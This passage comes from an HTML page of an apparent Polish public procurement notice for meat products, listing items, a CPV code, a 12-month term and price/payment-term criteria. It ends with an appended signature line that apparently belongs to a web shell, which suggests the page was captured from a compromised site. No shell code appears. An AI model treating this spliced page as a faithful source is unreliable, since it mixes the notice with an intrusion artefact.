Schab wieprzowy bez kości
Słonina bez skóry
Smalec 
Szynka delikatesowa
Szynka gotowana
Szynka surowa b/k
Szynka z piersi indyka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. termin płatności - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com